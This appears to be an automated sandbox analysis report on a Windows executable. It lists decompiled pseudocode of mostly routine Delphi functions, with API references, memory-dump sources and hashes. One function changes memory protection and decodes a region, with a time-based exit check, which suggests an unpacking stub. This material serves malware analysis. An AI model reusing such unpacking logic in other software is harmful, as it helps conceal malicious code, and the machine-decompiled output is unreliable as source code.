                                                                                				if(_t27 == 0) {
                                                                                					_t14 = _t57 + 0x80; // 0x94000000
                                                                                					E0041EDEC( *_t14, 8);
                                                                                					_t30 = GetStockObject(0xd);
                                                                                					_t15 = _t57 + 0x88; // 0x90000000
                                                                                					E0041ED08( *_t15, _t30, _t72);
                                                                                				} else {
                                                                                					_t41 = CreateFontIndirectA( &_v185);
                                                                                					_t11 = _t57 + 0x80; // 0x94000000
                                                                                					E0041ED08( *_t11, _t41, _t72);
                                                                                					_t45 = CreateFontIndirectA( &_v245);
                                                                                					_t13 = _t57 + 0x88; // 0x90000000
                                                                                					E0041ED08( *_t13, _t45, _t72);
                                                                                				}
                                                                                				_t16 = _t57 + 0x80; // 0x94000000
                                                                                				E0041EB4C( *_t16, 0x80000017);
                                                                                				_t17 = _t57 + 0x88; // 0x90000000
                                                                                				E0041EB4C( *_t17, 0x80000007);
                                                                                				 *[fs:eax] = 0x80000007;
                                                                                				_push(0x4538c0);
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t38 =  *0x487bfc; // 0x2291310
                                                                                					return E00455B88(_t38, _v5);
                                                                                				}
                                                                                				return 0;
                                                                                			}























                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004537C8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004537D5
                                                                                • GetStockObject.GDI32(0000000D), ref: 004537EB
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00453814
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00453824
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0045383D
                                                                                • GetStockObject.GDI32(0000000D), ref: 00453863
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                • String ID:
                                                                                • API String ID: 2891467149-0
                                                                                • Opcode ID: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction ID: 28a1cf3aa5b0351315609d5fbf45b2813be3316eb6b6f31c26dce7917962f236
                                                                                • Opcode Fuzzy Hash: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction Fuzzy Hash: 5731D6747042059BE740FB6ADC56B9A73E4AB04705F5480B6BD08DB3D3DE38ED488B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00452F98(char __edx, void* __edi) {
                                                                                				char _v5;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr* _t28;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr* _t45;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr _t57;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t62;
                                                                                				void* _t63;
                                                                                				char _t64;
                                                                                				void* _t74;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                
                                                                                				_t74 = __edi;
                                                                                				_t64 = __edx;
                                                                                				if(__edx != 0) {
                                                                                					_t77 = _t77 + 0xfffffff0;
                                                                                					_t25 = E00403918(_t25, _t76);
                                                                                				}
                                                                                				_v5 = _t64;
                                                                                				_t62 = _t25;
                                                                                				E0041B8BC(_t63, 0);
                                                                                				_t28 =  *0x486ab0; // 0x46b458
                                                                                				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                                                                				 *_t28 = 0x45333c;
                                                                                				_t29 =  *0x486abc; // 0x46b460
                                                                                				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                                                                				 *_t29 = 0x453348;
                                                                                				E00453354(_t62);
                                                                                				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                                                                				 *((intOrPtr*)(_t62 + 0x4c)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x50)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x54)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x58)) = E00403584(1);
                                                                                				_t42 = E00403584(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                                                                				L00406E20();
                                                                                				_t75 = _t42;
                                                                                				L00406AF8();
                                                                                				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                                                                				L00407080();
                                                                                				_t11 = _t62 + 0x58; // 0x44c4386e
                                                                                				_t45 =  *0x486bf0; // 0x487ab0
                                                                                				 *((intOrPtr*)( *_t45))(0, 0, E0044F81C,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                                                                				 *((intOrPtr*)(_t62 + 0x84)) = E0041E978(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x88)) = E0041E978(1);
                                                                                				 *((intOrPtr*)(_t62 + 0x80)) = E0041E978(1);
                                                                                				E00453774(_t62, _t62, _t63, _t74);
                                                                                				_t15 = _t62 + 0x84; // 0x38004010
                                                                                				_t56 =  *_t15;
                                                                                				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                                                                				 *((intOrPtr*)(_t56 + 8)) = 0x453650;
                                                                                				_t18 = _t62 + 0x88; // 0x90000000
                                                                                				_t57 =  *_t18;
                                                                                				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                                                                				 *((intOrPtr*)(_t57 + 8)) = 0x453650;
                                                                                				_t21 = _t62 + 0x80; // 0x94000000
                                                                                				_t58 =  *_t21;
                                                                                				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                                                                				 *((intOrPtr*)(_t58 + 8)) = 0x453650;
                                                                                				_t59 = _t62;
                                                                                				if(_v5 != 0) {
                                                                                					E00403970(_t59);
                                                                                					_pop( *[fs:0x0]);
                                                                                				}
                                                                                				return _t62;
                                                                                			}
























                                                                                APIs
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00452FDD
                                                                                • 72E7AC50.USER32(00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00453032
                                                                                • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 0045303C
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000), ref: 00453047
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B380KeyboardLayout
                                                                                • String ID:
                                                                                • API String ID: 648844651-0
                                                                                • Opcode ID: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction ID: d6432707c957d0cacee8399d567b12e74fb03ad8e22360b452518030eba30be5
                                                                                • Opcode Fuzzy Hash: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction Fuzzy Hash: A431D9B06002419FD740EF2AD8C1B997BE4AB0535AF44C07EED18DF3A6D779A908CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00401A78() {
                                                                                				void* _t11;
                                                                                				signed int _t13;
                                                                                				intOrPtr _t19;
                                                                                				void* _t20;
                                                                                				intOrPtr _t23;
                                                                                
                                                                                				_push(_t23);
                                                                                				_push(E00401B2E);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t23;
                                                                                				_push(0x4875c4);
                                                                                				L004013CC();
                                                                                				if( *0x487049 != 0) {
                                                                                					_push(0x4875c4);
                                                                                					L004013D4();
                                                                                				}
                                                                                				E0040143C(0x4875e4);
                                                                                				E0040143C(0x4875f4);
                                                                                				E0040143C(0x487620);
                                                                                				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                				 *0x48761c = _t11;
                                                                                				if( *0x48761c != 0) {
                                                                                					_t13 = 3;
                                                                                					do {
                                                                                						_t20 =  *0x48761c; // 0x70cc70
                                                                                						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                						_t13 = _t13 + 1;
                                                                                					} while (_t13 != 0x401);
                                                                                					 *((intOrPtr*)(0x487608)) = 0x487604;
                                                                                					 *0x487604 = 0x487604;
                                                                                					 *0x487610 = 0x487604;
                                                                                					 *0x4875bc = 1;
                                                                                				}
                                                                                				_pop(_t19);
                                                                                				 *[fs:eax] = _t19;
                                                                                				_push(E00401B35);
                                                                                				if( *0x487049 != 0) {
                                                                                					_push(0x4875c4);
                                                                                					L004013DC();
                                                                                					return 0;
                                                                                				}
                                                                                				return 0;
                                                                                			}









                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 730355536-0
                                                                                • Opcode ID: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction ID: 8e578660cdcaf939112aab1382d748daa181a052473268aee4a8a104828a0e1f
                                                                                • Opcode Fuzzy Hash: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction Fuzzy Hash: D501A1B0A4C6416EE715BB6A9826B1D7AD0D745304F608C7FE000B6AF2D7BCC440CB2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E0042626C(int _a4) {
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				signed int _t2;
                                                                                				signed int _t3;
                                                                                				void* _t7;
                                                                                				int _t8;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				void* _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t8 = _a4;
                                                                                				if( *0x487abc == 0) {
                                                                                					 *0x487a94 = E00426184(0, _t8,  *0x487a94, _t17, _t18);
                                                                                					_t7 =  *0x487a94(_t8); // executed
                                                                                					return _t7;
                                                                                				}
                                                                                				_t3 = _t2 | 0xffffffff;
                                                                                				_t12 = _t8 + 0xffffffb4 - 2;
                                                                                				__eflags = _t12;
                                                                                				if(__eflags < 0) {
                                                                                					_t3 = 0;
                                                                                				} else {
                                                                                					if(__eflags == 0) {
                                                                                						_t8 = 0;
                                                                                					} else {
                                                                                						_t13 = _t12 - 1;
                                                                                						__eflags = _t13;
                                                                                						if(_t13 == 0) {
                                                                                							_t8 = 1;
                                                                                						} else {
                                                                                							__eflags = _t13 - 0xffffffffffffffff;
                                                                                							if(_t13 - 0xffffffffffffffff < 0) {
                                                                                								_t3 = 1;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				__eflags = _t3 - 0xffffffff;
                                                                                				if(_t3 != 0xffffffff) {
                                                                                					return _t3;
                                                                                				} else {
                                                                                					return GetSystemMetrics(_t8);
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 004262CE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 00426294
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                • String ID: GetSystemMetrics
                                                                                • API String ID: 54681038-96882338
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00401A78: RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                  • Part of subcall function 00401A78: RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                  • Part of subcall function 00401A78: LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                  • Part of subcall function 00401A78: RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,004022E0), ref: 004021AF
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,004022E7), ref: 004022DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID:
                                                                                • API String ID: 2227675388-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453354(void* __eax) {
                                                                                				struct HICON__* _t5;
                                                                                				void* _t7;
                                                                                				void* _t8;
                                                                                				struct HINSTANCE__* _t11;
                                                                                				CHAR** _t12;
                                                                                				void* _t13;
                                                                                
                                                                                				_t13 = __eax;
                                                                                				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                                				_t8 = 0xffffffea;
                                                                                				_t12 = 0x46bbb4;
                                                                                				do {
                                                                                					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                                						if(_t8 != 0xffffffeb) {
                                                                                							_t11 = 0;
                                                                                						} else {
                                                                                							goto L4;
                                                                                						}
                                                                                					} else {
                                                                                						L4:
                                                                                						_t11 =  *0x487714; // 0x400000
                                                                                					}
                                                                                					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                                					_t7 = E0045340C(_t13, _t5, _t8);
                                                                                					_t8 = _t8 + 1;
                                                                                					_t12 =  &(_t12[1]);
                                                                                				} while (_t8 != 0xffffffff);
                                                                                				return _t7;
                                                                                			}










                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401590(void* __eax, void** __edx) {
                                                                                				void* _t3;
                                                                                				void** _t8;
                                                                                				void* _t11;
                                                                                				long _t14;
                                                                                
                                                                                				_t8 = __edx;
                                                                                				if(__eax >= 0x100000) {
                                                                                					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                				} else {
                                                                                					_t14 = 0x100000;
                                                                                				}
                                                                                				_t8[1] = _t14;
                                                                                				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                				_t11 = _t3;
                                                                                				 *_t8 = _t11;
                                                                                				if(_t11 != 0) {
                                                                                					_t3 = E00401444(0x4875e4, _t8);
                                                                                					if(_t3 == 0) {
                                                                                						VirtualFree( *_t8, 0, 0x8000);
                                                                                						 *_t8 = 0;
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				return _t3;
                                                                                			}








                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0046AA08(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
                                                                                				long _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				signed int _t22;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t31 = _a4;
                                                                                				if(E0046A9D0( *((intOrPtr*)( *_t31))) == 0) {
                                                                                					if(E0046A9FC( *((intOrPtr*)( *_t31))) == 0) {
                                                                                						return 0;
                                                                                					}
                                                                                					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x46a9bc;
                                                                                					return 0xffffffffffffffff;
                                                                                				}
                                                                                				_t22 =  *(_t31 + 4);
                                                                                				if(( *(_t22 + 0xa0) ^ 0x00019b81) != 0x5ecca) {
                                                                                					return 0;
                                                                                				}
                                                                                				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa4), 0x1465f, 4,  &_v8); // executed
                                                                                				E0046AAF8(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa4)), 0x1465f, __edi, __esi, 0x1acd9, 0x46bd08);
                                                                                				_t29 =  *(_t31 + 4);
                                                                                				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x40a3;
                                                                                				return _t29 | 0xffffffff;
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 0046A9D0: GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                  • Part of subcall function 0046A9D0: ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                • VirtualProtectEx.KERNEL32(000000FF,?,0001465F,00000004,?), ref: 0046AA48
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ExitProcessProtectSystemTimeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1291046601-0
                                                                                • Opcode ID: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction ID: 933bd6c47300b109d5fd9173ba739c1b5b1a8afb3f7ecdb2f71907d76ff0079e
                                                                                • Opcode Fuzzy Hash: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction Fuzzy Hash: 501152742046009FC700DF95C681E6273D5AF4A324F2482A7B628AF396E678EC55CB5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407286(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                				struct HWND__* _t10;
                                                                                
                                                                                				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                				return _t10;
                                                                                			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction ID: 764575f9a061b279fabeaa25adf60532a7347093fa5cbb10b55d8dde51a955d6
                                                                                • Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction Fuzzy Hash: 7BE0FEB2204209BFEB00DE8ADDC1DABB7ACFB4C654F814115BB1C97242D275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407288(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                				struct HWND__* _t10;
                                                                                
                                                                                				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                				return _t10;
                                                                                			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction ID: 3cd20fb1d280f358d9783e880d6765cd3a24c9f6542a4f025d110428a1baabb2
                                                                                • Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction Fuzzy Hash: 13E002B2204309BFEB00DE8ADDC1DABB7ACFB4C654F814105BB1C97242C275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405A3C(void* __eax) {
                                                                                				char _v272;
                                                                                				intOrPtr _t14;
                                                                                				void* _t16;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t19;
                                                                                
                                                                                				_t16 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                					_t3 = _t16 + 4; // 0x400000
                                                                                					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                					_t14 = E00405C78(_t19); // executed
                                                                                					_t18 = _t14;
                                                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                					if(_t18 == 0) {
                                                                                						_t5 = _t16 + 4; // 0x400000
                                                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                					}
                                                                                				}
                                                                                				_t7 = _t16 + 0x10; // 0x400000
                                                                                				return  *_t7;
                                                                                			}









                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?,00000400,?,004103FC,00413F53,00000000,00413F78), ref: 00405A5A
                                                                                  • Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                  • Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
